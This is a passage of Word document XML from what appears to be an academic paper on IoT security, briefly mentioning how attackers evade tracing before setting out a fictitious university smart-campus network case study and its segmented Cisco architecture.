        <w:t xml:space="preserve"> and disable the IPv6 protocol to prevent being identified in this </w:t>
      </w:r>
      <w:r w:rsidR="000A0AC1">
        <w:t>manner. If</w:t>
      </w:r>
      <w:r w:rsidR="00897215">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A0AC1">
        <w:t xml:space="preserve">the IPv6 protocol has been disabled on the attackers machine, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and they also </w:t>
      </w:r>
      <w:r w:rsidR="000A0AC1">
        <w:t>utilised</w:t>
      </w:r>
      <w:r w:rsidR="00897215">
        <w:t xml:space="preserve"> a VPN before tunnelling through</w:t>
      </w:r>
      <w:r w:rsidR="000A0AC1">
        <w:t xml:space="preserve"> the ‘T</w:t>
      </w:r>
      <w:r w:rsidR="00897215">
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidR="000A0AC1">
        <w:t>’ network</w:t>
      </w:r>
      <w:r w:rsidR="00897215">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>as an added security evasion measure</w:t>
      </w:r>
      <w:r w:rsidR="000A0AC1">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> it </w:t>
      </w:r>
      <w:r w:rsidR="00897215">
        <w:t>is nearly impossible to locate and identify</w:t>
      </w:r>
      <w:r w:rsidR="006559BC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the hacker, </w:t>
      </w:r>
      <w:r w:rsidR="006559BC">
        <w:t>unless advanced government cybersecurity tools</w:t>
      </w:r>
      <w:r w:rsidR="000A0AC1">
        <w:t xml:space="preserve"> are utilised</w:t>
      </w:r>
      <w:r w:rsidR="006559BC">
        <w:t xml:space="preserve"> and even then the probability of locating the attacker is very low unless they have made a mistake</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> somewhere else in their attack that leaves a clue to their location and/or identity</w:t>
      </w:r>
      <w:r w:rsidR="00897215">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1500126F" w14:textId="77777777" w:rsidR="00E11F62" w:rsidRPr="00E862F2" w:rsidRDefault="00E11F62" w:rsidP="00380F50">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08332176" w14:textId="675DC3FF" w:rsidR="00403E69" w:rsidRDefault="005073A0" w:rsidP="002A443D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Case Study </w:t>
      </w:r>
      <w:r w:rsidR="006E6196">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>– U</w:t>
      </w:r>
      <w:r w:rsidR="00C67A58">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">niversity </w:t>
      </w:r>
      <w:r w:rsidR="00476ADC">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">IoT </w:t>
      </w:r>
      <w:r w:rsidR="006E6196">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Smart Campus </w:t>
      </w:r>
      <w:r w:rsidR="00BC6451">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Network and </w:t>
      </w:r>
      <w:r w:rsidR="006E6196">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Security Implementation</w:t>
      </w:r>
      <w:r w:rsidR="00C67A58">
        <w:rPr>
          <w:smallCaps/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566B1582" w14:textId="77777777" w:rsidR="00F72838" w:rsidRPr="00F72838" w:rsidRDefault="00F72838" w:rsidP="00F72838">
      <w:pPr>
        <w:spacing w:line="72" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C5B275B" w14:textId="1A833046" w:rsidR="004A0008" w:rsidRDefault="00F72838" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Within this section of the research paper, a fictitious case study will be conducted that will implement the design and security measures within a ‘Smart IoT’ University LAN to mitigate </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cybersecurity threats and </w:t>
      </w:r>
      <w:r w:rsidR="00556573">
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that were</w:t>
      </w:r>
      <w:r w:rsidR="00806D23">
        <w:t xml:space="preserve"> previously</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> identified within this </w:t>
      </w:r>
      <w:r w:rsidR="00556573">
        <w:t xml:space="preserve">research </w:t>
      </w:r>
      <w:r>
        <w:t>paper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E3136C" w14:textId="336CE56F" w:rsidR="00CB162C" w:rsidRPr="00556573" w:rsidRDefault="00CB162C" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73AAACF0" w14:textId="0547ABCD" w:rsidR="00CB162C" w:rsidRPr="00CB162C" w:rsidRDefault="00CB162C" w:rsidP="00CB162C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB162C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Case Study Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA6C86F" w14:textId="77777777" w:rsidR="00556573" w:rsidRPr="00556573" w:rsidRDefault="00556573" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23E73948" w14:textId="51ECD5A7" w:rsidR="00186961" w:rsidRDefault="00556573" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A University called </w:t>
      </w:r>
      <w:r w:rsidR="00806D23">
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:t>UWTSD</w:t>
      </w:r>
      <w:r w:rsidR="00806D23">
        <w:t>-Swansea’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ha</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> utilised IoT technology </w:t>
      </w:r>
      <w:r w:rsidR="00B47C8D">
        <w:t xml:space="preserve">at the heart of the campus, </w:t>
      </w:r>
      <w:r>
        <w:t>to assist with</w:t>
      </w:r>
      <w:r w:rsidR="00591FF5">
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the security and maintenance of their </w:t>
      </w:r>
      <w:r w:rsidR="00806D23">
        <w:t xml:space="preserve">newly built </w:t>
      </w:r>
      <w:r>
        <w:t>‘Smart Campus’</w:t>
      </w:r>
      <w:r w:rsidR="00806D23">
        <w:t xml:space="preserve"> building called ‘IQ’</w:t>
      </w:r>
      <w:r w:rsidR="00B47C8D">
        <w:t xml:space="preserve">. The installed IoT devices utilise the Internet to communicate with an IoT server that is based externally within a cloud datacentre. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF9013B" w14:textId="77777777" w:rsidR="00186961" w:rsidRDefault="00186961" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20BC34CC" w14:textId="6332E135" w:rsidR="00556573" w:rsidRDefault="00806D23" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Within the IQ building </w:t>
      </w:r>
      <w:r w:rsidR="00B47C8D">
        <w:t>IoT devices are being utilised to monitor and implement; classroom and car park management that includes facial recognition of student</w:t>
      </w:r>
      <w:r w:rsidR="002F74D8">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00B47C8D">
        <w:t xml:space="preserve"> and staff to monitor attendance along with car park </w:t>
      </w:r>
      <w:r w:rsidR="002F74D8">
        <w:t xml:space="preserve">and classroom </w:t>
      </w:r>
      <w:r w:rsidR="00B47C8D">
        <w:t xml:space="preserve">occupancy, motion sensors are utilised to control the lighting and video </w:t>
      </w:r>
      <w:r w:rsidR="002F74D8">
        <w:t>surveillance</w:t>
      </w:r>
      <w:r w:rsidR="00B47C8D">
        <w:t xml:space="preserve"> of the car park </w:t>
      </w:r>
      <w:r w:rsidR="002F74D8">
        <w:t>and university building through</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="002F74D8">
        <w:t>ut the day and night, heat sensors are utilised within the IQ building to regulate the temperature and lower the carbon footprint of the University when rooms and/or the building is not being occupied, the security</w:t>
      </w:r>
      <w:r w:rsidR="00D2141E">
        <w:t xml:space="preserve"> alarms</w:t>
      </w:r>
      <w:r w:rsidR="002F74D8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D2141E">
        <w:t xml:space="preserve">and smoke detectors </w:t>
      </w:r>
      <w:r w:rsidR="002F74D8">
        <w:t xml:space="preserve">are </w:t>
      </w:r>
      <w:r w:rsidR="00D2141E">
        <w:t>throughout</w:t>
      </w:r>
      <w:r w:rsidR="00B61033">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="002F74D8">
        <w:t xml:space="preserve"> entire university </w:t>
      </w:r>
      <w:r w:rsidR="00437C65" w:rsidRPr="00437C65">
        <w:t>perimeter</w:t>
      </w:r>
      <w:r w:rsidR="002F74D8" w:rsidRPr="00437C65">
        <w:t xml:space="preserve"> that</w:t>
      </w:r>
      <w:r w:rsidR="002F74D8">
        <w:t xml:space="preserve"> includes the building and car park</w:t>
      </w:r>
      <w:r w:rsidR="00D2141E">
        <w:t xml:space="preserve"> that</w:t>
      </w:r>
      <w:r w:rsidR="002F74D8">
        <w:t xml:space="preserve"> are </w:t>
      </w:r>
      <w:r w:rsidR="0005223C">
        <w:t xml:space="preserve">all </w:t>
      </w:r>
      <w:r w:rsidR="002F74D8">
        <w:t xml:space="preserve">connected to an external </w:t>
      </w:r>
      <w:r w:rsidR="0005223C">
        <w:t>cloud IoT</w:t>
      </w:r>
      <w:r w:rsidR="002F74D8">
        <w:t xml:space="preserve"> company to monitor</w:t>
      </w:r>
      <w:r w:rsidR="0005223C">
        <w:t xml:space="preserve"> the IoT devices remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4812F99A" w14:textId="1AFE6D80" w:rsidR="00C76D58" w:rsidRDefault="00C76D58" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DBB9833" w14:textId="755C6F8C" w:rsidR="00C76D58" w:rsidRDefault="00C76D58" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A ‘Smart Garden’ is also being trialled at the University to monitor </w:t>
      </w:r>
      <w:r w:rsidR="0005223C">
        <w:t xml:space="preserve">the soil </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and water the plants/grass within the garden </w:t>
      </w:r>
      <w:r w:rsidR="00D701F0">
        <w:t>inside</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the newly created ‘Tranquillity’ garden</w:t>
      </w:r>
      <w:r w:rsidR="00D701F0">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for students and staff to utilise</w:t>
      </w:r>
      <w:r w:rsidR="00D701F0">
        <w:t xml:space="preserve"> and enjoy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> during breaks</w:t>
      </w:r>
      <w:r w:rsidR="002926D2">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to relieve stress from working indoors</w:t>
      </w:r>
      <w:r w:rsidR="00D701F0">
        <w:t>, as psychological research suggests that exposure to light and natural surroundings greatly reduces stress for office workers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0F2BD4" w14:textId="70113BFB" w:rsidR="002F74D8" w:rsidRDefault="002F74D8" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25E5245C" w14:textId="395F08D3" w:rsidR="00D701F0" w:rsidRDefault="002F74D8" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The University ha</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> also implemented a Bring Your Own Device (BYOD) scheme to allow </w:t>
      </w:r>
      <w:r w:rsidR="00C76D58">
        <w:t>staff, students</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and partners of the University to connect to the </w:t>
      </w:r>
      <w:r w:rsidR="00D701F0">
        <w:t>campus’s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LAN along with an Extranet for external partners to access a limited amount </w:t>
      </w:r>
      <w:r w:rsidR="00C76D58">
        <w:t>of University</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> data. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3053B870" w14:textId="77777777" w:rsidR="00D701F0" w:rsidRDefault="00D701F0" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6036EF76" w14:textId="40ECC720" w:rsidR="002F74D8" w:rsidRDefault="002F74D8" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Staff have also been given flexible working </w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:t>ours that allow them to connect to the University’s LAN</w:t>
      </w:r>
      <w:r w:rsidR="00D701F0">
        <w:t xml:space="preserve"> via a VPN,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to access resources from home when they are not lecturing</w:t>
      </w:r>
      <w:r w:rsidR="00CB165F">
        <w:t>. T</w:t>
      </w:r>
      <w:r w:rsidR="00D701F0">
        <w:t xml:space="preserve">his scheme was </w:t>
      </w:r>
      <w:r w:rsidR="00804913">
        <w:t>implemented</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to make the University more attractive to staff who</w:t>
      </w:r>
      <w:r w:rsidR="00D701F0">
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> have children</w:t>
      </w:r>
      <w:r w:rsidR="00D701F0">
        <w:t>, are sick</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D701F0">
        <w:t>and/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidR="00CB165F">
        <w:t>have</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> disabilities that prevent them from being at the campus 5 days a week.</w:t>
      </w:r>
      <w:r w:rsidR="00CB165F">
        <w:t xml:space="preserve"> A VPN has also been implemented for external partners to remotely utilise a limited amount of the UWTSD datacentre resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750C954D" w14:textId="7EC8A028" w:rsidR="00804913" w:rsidRDefault="00804913" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71B52207" w14:textId="652238CB" w:rsidR="00804913" w:rsidRDefault="00480430" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00CB165F">
        <w:t>he</w:t>
      </w:r>
      <w:r w:rsidR="00804913" w:rsidRPr="00804913">
        <w:t xml:space="preserve"> logical topology of the UWTSD-Smart Campus can be found in</w:t>
      </w:r>
      <w:r w:rsidR="00804913">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> figure </w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r w:rsidR="00804913">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4120A461" w14:textId="1C4EE53F" w:rsidR="00CB165F" w:rsidRDefault="00CB165F" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E38351E" w14:textId="195234AE" w:rsidR="00CB165F" w:rsidRDefault="003F7F9B" w:rsidP="00CB165F">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F3F9232" wp14:editId="46A77045">
            <wp:extent cx="3200400" cy="2324100"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="190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200400" cy="2324100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B5E376" w14:textId="176ABF72" w:rsidR="0074118B" w:rsidRPr="0074118B" w:rsidRDefault="00CB165F" w:rsidP="0074118B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r w:rsidR="002010EA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="0074118B">
        <w:t xml:space="preserve"> Cisco</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D87B36">
        <w:t>PT</w:t>
      </w:r>
      <w:r w:rsidR="0074118B">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:t>UWTSD 'Smart Campus' Logical Topology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2420E7F9" w14:textId="7AC74060" w:rsidR="00C27241" w:rsidRDefault="00C27241" w:rsidP="00C27241">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The UWTSD logical </w:t>
      </w:r>
      <w:r w:rsidR="0074118B">
        <w:t>topology</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0074118B">
        <w:t xml:space="preserve">illustrated in </w:t>
      </w:r>
      <w:r w:rsidR="0074118B" w:rsidRPr="0074118B">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="004972EB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r w:rsidR="0074118B">
        <w:t xml:space="preserve"> has been logically segmented for ease of management, high throughput, low latency, high availability and robust security that will </w:t>
      </w:r>
      <w:r w:rsidR="001E6971">
        <w:t>be further</w:t>
      </w:r>
      <w:r w:rsidR="0074118B">
        <w:t xml:space="preserve"> discussed in the below section of this paper. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0A771C" w14:textId="4B883421" w:rsidR="0074118B" w:rsidRDefault="0074118B" w:rsidP="00C27241">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4344B05A" w14:textId="3F7BF96D" w:rsidR="0074118B" w:rsidRPr="00EA4899" w:rsidRDefault="0074118B" w:rsidP="00C27241">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA4899">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">A larger image of the </w:t>
      </w:r>
      <w:r w:rsidR="00EA4899" w:rsidRPr="00EA4899">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Cisco </w:t>
      </w:r>
      <w:r w:rsidR="00D87B36">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>PT</w:t>
      </w:r>
      <w:r w:rsidR="00EA4899" w:rsidRPr="00EA4899">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">; UWTSD ‘Smart Campus’ </w:t>
      </w:r>
      <w:r w:rsidR="001E6971">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">along with all other images within this section of the paper </w:t>
      </w:r>
      <w:r w:rsidR="00EA4899" w:rsidRPr="00EA4899">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">can be found in </w:t>
      </w:r>
      <w:r w:rsidR="00CC313A">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00EA4899" w:rsidRPr="00EA4899">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ppendix</w:t>
      </w:r>
      <w:r w:rsidR="00CC313A">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>-A</w:t>
      </w:r>
      <w:r w:rsidR="00EA4899" w:rsidRPr="00EA4899">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> of this paper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BF15EB" w14:textId="77777777" w:rsidR="0074118B" w:rsidRPr="00C27241" w:rsidRDefault="0074118B" w:rsidP="00C27241">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B334128" w14:textId="40982084" w:rsidR="00182573" w:rsidRDefault="00182573" w:rsidP="008B2B9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B2B9E">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>UWTSD ‘Smart Campus’ Network Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27243C66" w14:textId="77777777" w:rsidR="00EA4899" w:rsidRPr="00EA4899" w:rsidRDefault="00EA4899" w:rsidP="00EA4899">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AFF9FD2" w14:textId="77777777" w:rsidR="00846F41" w:rsidRDefault="00EA4899" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The UWTSD ‘Smart’ campus architecture has been logically segmented as previously discussed into </w:t>
      </w:r>
      <w:r w:rsidR="00232187">
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> segments utilising </w:t>
      </w:r>
      <w:r w:rsidR="00232187">
        <w:t xml:space="preserve">a combination of </w:t>
      </w:r>
      <w:r>
        <w:t>the Cisco LAN 3-Tier architecture</w:t>
      </w:r>
      <w:r w:rsidR="00654B17">
        <w:t>; Core, Distribution and Access</w:t>
      </w:r>
      <w:r w:rsidR="00846F41">
        <w:t xml:space="preserve"> layers along with the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> emulated </w:t>
      </w:r>
      <w:r w:rsidR="00846F41">
        <w:t xml:space="preserve">ISP </w:t>
      </w:r>
      <w:r>
        <w:t>WAN architecture.</w:t>
      </w:r>
      <w:r w:rsidR="00846F41">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154F9FA3" w14:textId="77777777" w:rsidR="00846F41" w:rsidRDefault="00846F41" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A551948" w14:textId="15E7C42A" w:rsidR="00182573" w:rsidRPr="00846F41" w:rsidRDefault="00846F41" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The architecture of the network will be discussed within this section of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>paeper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and the cybersecurity mitigation and implementation architecture of the UWTSD ‘Smart Campus’ network will be further discussed within the </w:t>
      </w:r>
      <w:r w:rsidRPr="00846F41">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Cybersecurity Considerations and Implementation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>of this paper</w:t>
      </w:r>
      <w:r w:rsidR="008F5C3A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EE900F" w14:textId="6B196FD8" w:rsidR="00EA4899" w:rsidRDefault="00EA4899" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5712813F" w14:textId="24216BEF" w:rsidR="00EA4899" w:rsidRDefault="00EA4899" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="00846F41">
        <w:t xml:space="preserve"> architectural network design</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> segments are as follows;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E258E62" w14:textId="01D4444F" w:rsidR="00EA4899" w:rsidRDefault="00EA4899" w:rsidP="00F72838">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C843433" w14:textId="4F46031B" w:rsidR="00654B17" w:rsidRDefault="00654B17" w:rsidP="00654B17">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00654B17">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>UWTSD Core and Demilitarised Zone (DMZ)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF21287" w14:textId="77777777" w:rsidR="000C68DA" w:rsidRPr="000C68DA" w:rsidRDefault="000C68DA" w:rsidP="000C68DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="491F8781" w14:textId="5D5FAC94" w:rsidR="006C266B" w:rsidRDefault="00232187" w:rsidP="00232187">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
